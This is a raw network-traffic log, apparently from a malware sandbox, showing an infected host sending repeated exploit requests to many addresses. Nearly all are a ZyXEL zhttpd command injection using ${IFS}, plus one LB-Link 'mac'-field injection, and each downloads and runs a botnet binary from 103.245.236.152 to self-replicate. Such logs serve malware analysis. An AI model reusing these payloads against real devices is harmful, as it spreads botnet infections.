                                        Jan 14, 2024 16:18:58.794914961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8416192.168.2.1338994131.131.3.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.799856901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8417192.168.2.1355412173.58.32.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.799915075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8418192.168.2.135719282.1.137.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.799942970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8419192.168.2.1353558209.216.3.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800049067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8420192.168.2.1333430112.234.9.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800088882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8421192.168.2.1350292137.203.150.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800159931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8422192.168.2.134719875.126.107.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800235033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8423192.168.2.1360120199.226.148.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800262928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8424192.168.2.1335606169.124.33.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800318956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8425192.168.2.1344802196.159.113.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800359964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8426192.168.2.1338072106.89.94.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800424099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8427192.168.2.136037681.103.189.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800479889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8428192.168.2.134749254.18.34.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800538063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8429192.168.2.135441085.240.64.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800571918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8430192.168.2.1334270212.9.4.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.800633907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8431192.168.2.1353886185.145.183.818080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.158169031 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:59.377077103 CET140INHTTP/1.1 403 Forbidden
                                        Content-Type: text/html;charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        Cache-control: no-cache


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8432192.168.2.1354962185.145.183.818080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.593611002 CET140INHTTP/1.1 403 Forbidden
                                        Content-Type: text/html;charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        Cache-control: no-cache


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8433192.168.2.1345486114.199.168.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.810739994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8434192.168.2.134711296.33.174.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.810806990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8435192.168.2.13575428.135.45.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.810857058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8436192.168.2.1352852213.203.141.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.810925961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8437192.168.2.1333844152.0.123.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.810967922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8438192.168.2.1347686112.46.241.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811044931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8439192.168.2.1350556204.106.175.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811084032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8440192.168.2.133699061.231.253.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811165094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8441192.168.2.134804296.165.24.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811211109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8442192.168.2.1349418139.212.57.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811261892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8443192.168.2.134347672.250.70.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811321974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8444192.168.2.134527658.26.234.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811383009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8445192.168.2.1360056171.109.170.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811450958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8446192.168.2.134229048.245.220.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811486006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8447192.168.2.1348446192.110.111.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811532021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8448192.168.2.1346782201.88.220.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811600924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8449192.168.2.1335502220.182.50.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811676979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8450192.168.2.134192480.211.157.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811747074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8451192.168.2.1347884183.153.38.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811791897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8452192.168.2.1344476184.16.106.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811881065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8453192.168.2.1345628109.76.56.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.811929941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8454192.168.2.1339806187.161.14.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812000036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8455192.168.2.1337308157.80.54.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812066078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8456192.168.2.1340550146.89.131.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812115908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8457192.168.2.1352642135.173.249.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812187910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8458192.168.2.1343402112.96.241.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812252045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8459192.168.2.1359400177.178.99.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812294960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8460192.168.2.1343200203.162.194.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812362909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8461192.168.2.1359682156.68.15.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812428951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8462192.168.2.1347874185.69.236.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812474966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8463192.168.2.1358766210.109.101.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812558889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8464192.168.2.1347556122.210.5.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812571049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8465192.168.2.133390658.250.211.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812614918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8466192.168.2.134433439.132.71.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812689066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8467192.168.2.134761643.104.170.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812760115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8468192.168.2.1332916152.176.155.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812850952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8469192.168.2.134206459.8.18.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812922955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8470192.168.2.133463246.114.137.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812971115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8471192.168.2.136027686.18.117.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.812998056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8472192.168.2.135386262.142.157.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813046932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8473192.168.2.1351352101.227.58.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813139915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8474192.168.2.1350860216.16.241.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813177109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8475192.168.2.1334666203.219.4.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.813234091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8476192.168.2.134433013.134.250.107443
                                        TimestampBytes transferredDirectionData
